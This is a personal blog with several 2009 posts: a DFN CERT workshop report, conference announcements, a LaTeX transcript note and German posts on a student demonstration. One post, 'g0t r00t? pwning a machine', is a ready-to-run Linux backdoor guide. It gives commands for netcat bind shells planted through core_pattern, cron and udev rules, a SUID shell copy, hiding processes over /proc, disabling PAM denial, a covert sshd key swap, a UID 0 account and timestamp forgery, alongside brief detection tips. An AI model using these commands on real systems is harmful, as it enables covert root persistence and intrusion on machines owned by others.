16th DFN CERT Workshop 2009

Again, I had the great pleasure to attend the annual DFN Workshop which takes place in the Conference Center Hamburg (ever thought about, why they haven’t called it “Konferenz Zentrum”?).

dfn-cert logo

It’s more “tieish” than a Chaos Communication Congress but it’s still comfortable being there. Most people have a strong academic background so they were used to jeans and pullovers as well 😉

The first person to speak was a Dr. Neil Long from Team Camry and he spoke about the underground economy. They claim to research and investigate in that area and make deals with the criminals. He showed IRC logs most of the time and it was quite funny to see how the people interact with each other. They actually do speak 1337 and even I had a tough time reading their conversation 😉 He explained in great detail how the underground is organized. He claimed, that there are specialists for everything, everywhere. Programmers, Exploit-writers, Webhosts, Credit Card stealers, yadda yadda. Everything has it’s price and that is paid through various online money trasferring systems.

The next guy talked about Exploit Toolkits for the Web. He named various kits, like MPack, IcePack, NeoSploit, FirePack or UniquePack. They basically allow you to create a drive-by download site and deploy a given payload. The programs itself are split up into two parts. A server part which actually exploits a browser and makes it download and execute a loader program which in turn downloads the second stage – the real malware to be run on the victims machine. The other part is a binary to create that first-stage program. I spent some time in searching for those toolkits and downloaded some of them. That required me to learn some Russian 😉
This first-stage part opens an interesting attack vector to the wannabe hackers: Many Web Exploit Toolkits were infected with malware themselves. Because you have to run a strange smelling binary to create your first-stage excutable, you might run foreign malware yourself. I actually don’t understand, why this loader thing is such a big issue. I assume you could deploy your malware in first place without having it loaded through a staging program.

The next interesting talk was given by the smart guys from Red Team Pentesting, which is a pretty interesting company actually. Former students founded that company and they do professional Pentesting. I have to admit, that I envy them a little. It must be a great job with a lot of interesting stuff to see. Anyay, they talked about jBoss insecurities. It seems that jBoss comes with development configuration and the people don’t change them to productive values but blindly bind their server to the network. It turns out that you can get shell access through nearly a handful ways, even if a smart administrator has locked some ways down. Also, many corporate or governmental site are driven by a jBoss server and -which is the interesting part- have a weak configuration. They have an interesting statistic that shows that only 8% of the JBoss servers out there are reasonably secure.

How secure is the JBoss Web?
How secure is the JBoss Web?

I was actually bored by just one talk. It was about GRID Firewalls. While the topic is interesting in general, the guy made me fall asleep :- That’s a pity, because I believe he knew what he was talking about and had valuable information to deliver, especially due to his strong emphasis on practical problems. Maybe he can get his talk accepted next year and improve his talking skills.

After the first day, we visited the Groeninger Braukeller which was a real blast! They have one of the finest beers I know of. Also the food in there is delicious. It’s a perfect atmosphere to get together and discuss the talks you’ve just listened to. I also took the chance to meet old friends which I haven’t seen for a while.

Probably due to the massive amount of food and beer, I couldn’t sleep well that night and I thus was very tired the second day. I’ve listened to the talks but I couldn’t make it to the ModSecurity workshop 🙁 It’s really annoying, because I actually wanted to attend that session! I do use ModSecurity at some projects and I think it’s a good tool. A reallife-relevant workshop would have been great.

So, if you have nothing else to do on 2009-02-09, consider coming to Hamburg and enjoy the 17th DFN Workshop!

g0t r00t? pwning a machine

Imagine you have root access to a machine for, say, 15 minutes. Or better: Imaging you have accidentally left your machine unattended for about 900 seconds and once you’re back, you’re wondering, what an attacker could have done.

I’ll explain a few simple and quick attacks which will have a rather high impact. The main motivation came from the Hacking Contest at the LinuxTag in Berlin. It’s rules in short are: Have your laptop backdoored in 15 minutes by the opponent team while you backdoor theirs, clean your computer in 15 minutes and exploit the opponents laptop in the following 15 minutes.

core pattern

You can give the kernel a crash handler which will be executed if a segfault happens. Ubuntu uses that to launch apport and you can hijack this feature to have your rootshell executed:

   echo '|/bin/nc.traditional -l -p 31337 -e /bin/sh' | sudo tee /proc/sys/kernel/core_pattern
   gedit & kill -SEGV %%

You see, it’s pretty simple, quick to install and it’s powerful as well. You can now connect to localhost 31337 to have a rootshell. Of course you could launch connect back shells or any other malicious program.

To counter this threat, you might want to read this core_pattern file or in doubt erase the signal handler:

  echo '' | sudo tee /proc/sys/kernel/core_pattern

cronjobs

You know cronjobs, don’t you? But do you know the cronjobs of the “games” or “mysql” user? And have you checked your /etc/cron.*/? You better do 😉 Because installing malicious scripts there is pretty simple:

  for u in root games mysql; do sudo crontab -e -u $u; done
  5 * * * * /bin/nc.traditional -l -p 31337 -e /bin/sh

You might want to copy a file with the above mention cron string to  /etc/cron.hourly/ and /etc/cron.d/.

If you are a smart attacker, you have multiple lines containing the same job, especially one line after 1000 newlines, so that the admin has to scroll years to find it…

To counter this, check your cronjobs: sudo ls -l /var/spool/cron/crontabs/ /etc/cron.*/

dash backdoor

If you run a program which has the SUID bit set, then you have the rights of the user owning that file. That can be useful for ping or passwd, but probably isn’t for a shell. That’s why you can’t set the SUID bit on the bash. The “dash”, however, allows that 🙂

  sudo cp /bin/dash /bin/ping4 && sudo chmod u+s /bin/ping4

To find SUID binaries: find / ( -perm -4000 -o -perm -2000 ) -type f -exec ls -la {} ;

You’ll get a rootshell by simply executing ping4.

hide processes (with listening sockets) from ps and lsof

mkdir /tmp/empty
/bin/nc.traditional -l -p 31337 -e /bin/sh &
ps aux | grep $!
sudo mount --bind /tmp/empty /proc/$!
ps aux | grep $!

Countermeasure: netstat -tulpe and checking cat /proc/$$/mountinfo for suspicious mounts over /proc/.

udev exploit device

The idea is to plug an exploit device into that machine and have a rootshell.

I plugged a usb mouse into the laptop, viewed dmesg or udevadm monitor to find the devices ID, which then can be used with udevadm info --path:

  udevadm info --attribute-walk --path=/devices/pci0000:00/0000:00:1d.0/usb5/5-1/5-1:1.0/input/input18

That’ll produce udev attributes which can be used to write rules, e.g.

  SUBSYSTEM=="input", RUN+="/bin/nc.traditional -l -p 31337 -e /bin/sh"

You want to hide that /etc/udev/rules.d or better /lib/udev/rules.d/.

To counter this threat, you have no choice besides:

  grep -rn RUN /etc/udev/rules.d/ /lib/udev/rules.d/

which is unfortunately not that easy.

PAM deauthentify

Most of the time, PAM is the central place for all services to authenticate a user. While configuring PAM is not the most exciting thing I know, you can exploit it without actually know anything about the modules or the syntax.

Simply replace  pam_deny with pam_permit in /etc/pam.d/common-auth:

"auth   requisite           pam_permit.so"

To counter modified PAM rules, there’s nothing you can do besides reading your rules 🙁 If you go down this rabbit hole, bring a flashlight.

A better hack would be to replace the deny module with the permit module! cd /lib/security; ln -f pam_permit.so pam_deny.so

If it’s hardlinked like about, you can find these with

find . -links +1

if it’s copied, instead of hardlinked, you have to compare file hashes or better reinstall libpam-modules.

rewrite sshd config

Public key authentication is very convenient, because you don’t have to remember passwords. Also you can you hijack accounts easily if you add your public key to the files with authorized keys 😉

cat ~/.ssh/id_rsa.pub | sudo tee /root/.wgetrc
cp /etc/ssh/sshd_config /tmp/
Put AuthorizedKeysFile %h/.wgetrc in /etc/ssh/sshd_config
Put Banner /etc/issue.net in /etc/ssh/sshd_config
sudo /etc/init.d/ssh reload
mv /tmp/sshd_config /etc/ssh/
cat ~/.ssh/id_rsa | sudo tee /etc/issue.net

This probably needs some explanation.We first copy the public key into an innocent looking file, then save the original SSHd configuration, before we edit it and put those configuration strings in it. By reloading the SSHd it’ll recognize the new configuration and we then mv the original config back! That way, the admin doesn’t see anything suspicious but the SSHd will run with your configuration! *yay*. In order to use the stored private key, we’ll blow it out to the world by putting it into the SSHd banner 😉

To counter this, either patch your sshd that it’ll immediately reload once the configuration file has been change using inotify (udev does that) or review your SSHd config and reload it even if you haven’t changed anything!

New Users with UID 0

For some reason, it is not important that a user is named “root”, but that it’s uid is 0. So if you create a user with the uid 0, you’ll have root privileges 🙂 Multiple users with the same uid but different name isn’t harmful. So combining this with the 1000 scrolllines trick mentioned above, you have to do something like this:

echo 'hackr:x:0:0:hackr,,,:/home/hackr:/bin/bash' | sudo tee -a /etc/passwd
printf %sn%s hackr hackr | sudo passwd hackr

add 1000 lines to the passwd file and do the things above again.

To counter, grep ':0:' /etc/passwd

Vino

GNOME ships a VNC Server which can be activated with vino-preferences. Or for the lazy people:

gconftool-2 --set /desktop/gnome/remote_access/enabled --type bool true
gconftool-2 --set /desktop/gnome/remote_access/prompt_enabled --type bool false
gconftool-2 --set /desktop/gnome/remote_access/view_only --type bool false

Timestamps

If you want to find files which have been recently modified, you can used “find”:

To find last modified files:

  find -mtime -1 /

Or recently created files

  find -ctime -1 /

If you have a reference file:

  find -newer /path/to/file

To hide your changes to a file, you can use “find” with “touch” to either simply touch the files to give them the current timestamp, or give them a the timestamp of a reference file:

  find /tmp/ -exec touch --reference=/path/to/file '{}' ;

LaTeX Transcript of Records

As I want to go to Dublin this year and I have to apply at the DCU. I have to list everything I did so far in my university and I asked our secretary whether we have english transcripts, because having them officially  translated is really expensive. She sent me a Word document which I was supposed to fill out. Of course, I was not satisfied at all, because the document looked terrible.

So I decided to write an equivalent in LaTeX (compiled PDF). I learned a lot about multipage tables and multirow cells 😉  Because I want to share my knowledge and don’t want you to spend two days on that as I did, you may feel free to use it for whatever you like 🙂

page-001

page-002

page-003

Update: New link to Transcript (with embedded TeX Source).

26C3: Here Be Dragons

Well well, the next Chaos Communication Congress has been officially announced *yay*! This years motto will be Here Be Dragons.

This motto is not as bad as I intuitively thought. It reflects the current political situation pretty well: It seems as if the politicians are actively avoiding knowledge in the area of IT.

HERE BE DRAGONS

You should consider to come by as well as sending in a paper! You have time until 2009-10-09 to submit your proposal via Pentabarf.

I don’t know if I can make it, but I’ll certainly try 🙂

Bericht zur KIF

Ein kurzer Nachtrag zur Pressemitteilung, die ich ungern so im Raum stehen lassen moechte. Zum einen gibt es genug Kritik am Grundgesetz selber und zum anderen sind ein paar Worte zur Dortmunder KIF nötig.

KIF37.0 Logo

Ein zusammenfassender Bericht zur KIF befindet sich im FSR Blog. Ich habe nicht das Gefuehl, dass dem noch mehr hinzuzufuegen ist. Der ist zwar nicht so schoen zu lesen, wie der vom letzten Mal, aber fuer Erst-KIFfels gut geeignet um einen Eindruck zu bekommen.

Zum organisiatorischen vor Ort: Die Dortmunder Orga war ziemlich unentspannt. Ueberhaupt scheint es in Dortmund einen Regel-Fanatismus zu geben: Beim Betreten eines Busses muss mensch zu jeder Zeit sein Ticket vorzeigen, der Busfahrer haelt auch mitten in der Nacht nicht ausnahmsweise mal an einer Zwischenhaltestelle an und im Schwimmbad muss mensch nicht nur beim Betreten, sondern auch beim Verlassen seine Zugangsberechtigungskarte vorzeigen. Das hat uns in unserer Demo-Vorbereitungs-Phase ziemlich behindert: Weil wir die Rechner nicht mal eben auf dem Tisch verschieben konnten, die Tackernadeln wohl ein extrem wertvolles Gut waren und es insgesamt irgendwie schlechtes Karma gab, haben wir viel von unserer Vorbereitungs-Zeit mit dem Finden von Alternativplaenen verbrannt. Besonders geaergert hat mich, dass die Orgas eine schriftliche (sic!) Bestaetigung der (muendlich angemeldeten) Demo haben wollten. Nur um sicherzugehen, dass das alles rechtens sei. Weil ich mit den Polizisten vor Ort, also in der Innenstadt, verabredet war, bot ich an, dass ja ein Orga mitkommen koenne, weil so ein Gespraech von Polzist zu Anmelder beweist ja wohl ziemlich gut, dass alles mit rechten Dingen zugeht. Aber darauf wollte man sich aus unbekannten Gruenden nicht einlassen.

Demo in der Stadt

Ob die Grundrechtsdemo ueberhaupt so schlau war, ist eine interessante Frage. Zwar wird unser Grundgesetz viel gelobt und gepriesen, aber es gibt durchauch kritische Stimmen, die unser Grundgesetz aus verschiedenen Gruenden schlecht finden. Zur Geschichte unseres GGs gibt es bei Telepolis einen informativen Artikel. Zur spannenden Kritik schreibt das Magazin auch und ich finde, es gibt wirklich einige interessante Punkte. Ich koennte diese jetzt aufzaehlen und windige Akademiker machen das wohl auch so, aber ich glaube, dass die original Zitate die beste Quelle des Wissens sind 😛

Trotz der Kritik finde ich, dass die Bewusstseinsschaffung gut und wichtig war. Unser Grundgesetz mag zwar nicht das Beste sein, aber ohne verbriefte Grundrechte moechte ich lieber nicht leben.

KIF 37.0 Demostriert für den Erhalt der Grundrechte

Informatikstudierende demonstrieren

Am Samstag, dem 23.05.2009, wurde das Grundgesetz 60 Jahre alt. Aus diesem Anlass fand sich auch in Dortmund vor der Reinoldikirche eine Gruppe kritischer Studentenvertreter zusammen und demonstrierte für den Erhalt der Grundrechte. Insbesondere die aktuellen Vorstöße zur Zensur des Internets bereiten den Teilnehmern der 37,0. Konferenz der Informatikfachschaften (KIF) große Sorge.

Handeln statt Wegsehen, Loeschen statt Sperren
Handeln statt Wegsehen, Loeschen statt Sperren

Abbau der Grundrechte

Der Vorstoß zum Aufbau einer umfassenden Kontrollinfrastruktur zur Beschränkung des Zugangs zu Webseiten sei aufgrund der Verbesserung des Kinderschutzes gerechtfertigt, so das Familienministerium. Dies würde erstmalig eine Sperrung von unliebsamen Internetinhalten in sämtlichen Bereichen des öffentlichen Lebens ermöglichen. Ebenso werden Grundrechte unter Anderem durch die Vorratsdatenspeicherung und das BKA-Gesetz eingeschränkt. Betrachtet man diese Entwicklungen in ihrer Gesamtheit, so ist ein fortschreitender Abbau der verfassungsrechtlich garantierten Grundrechte festzustellen.

Grundgesetzlesung

Aufgrund dieser Entwicklungen und anlässlich des 60. Geburtstags des Grundgesetzes fühlte sich eine Gruppe engagierter studentischer Bürgerrechtler dazu verpflichtet, auf diese Probleme hinzuweisen. Dazu versammelten sie sich vor der Reinoldikirche, um mit Grundgesetzlesungen und Transparenten auf die gefährdeten Artikel der Verfassung aufmerksam zu machen. Besondere Beachtung fand hierbei Artikel 5 des Grundgesetzes, welcher durch die aktuellen Pläne zur Blockierung des Internets gefährdet sei.

Dialog mit den Bürgern

“Wichtig war uns, im Dialog mit den Bürgern herauszuarbeiten, dass die Bekämpfung von Kinderpornografie auch schon jetzt ohne die Einschränkung der Grundrechte möglich wäre”, so Tobias Müller, Informatikstudent und Anmelder der Versammlung.

Zensur droht

Hinzufügend merkt eine weitere kritische Studentin an: “Von der Leyens Idee einer durch das BKA  aufgestellten Sperrliste könnte auch Webseitenbetreffen, die keine Kinderpornografie beinhalten. Es gibt  eine Möglichkeit einer öffentlichen Kontrolle. Wir sehen daher die Gefahr einer nach Artikel 5 ‘nicht stattfindenden’ Zensur.”

Demonstranten in der Innenstadt

Über die Konferenz der Informatikfachschaften (KIF): Die Konferenz der Informatikfachschaften (KIF) ist die halbjährlich stattfindende Bundesfachschaftentagung Informatik. Die 37,0. KIF findet vom 20.-24.
Mai 2009 an der TU Dortmund statt.

Taxi from Hamburg to HAR2009

Pre-Sense is sponsoring a bus ride for up to 30 people to the HAR2009! The way back to Hamburg is sponsored as well. Also, you can win two HAR tickets! 🙂

HAR Plakat

It’s very kind of that young company to sponsor that trip and thus enable young hackers to meet with the brightest people in the IT-Security area. I wonder if they hope that some of these young hackers will take one of their open positions in the future 😉

Anyway, feel free to register for the bus ride or win a ticket. The details can be found at http://www.pre-sense.de/har2009.html.

Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.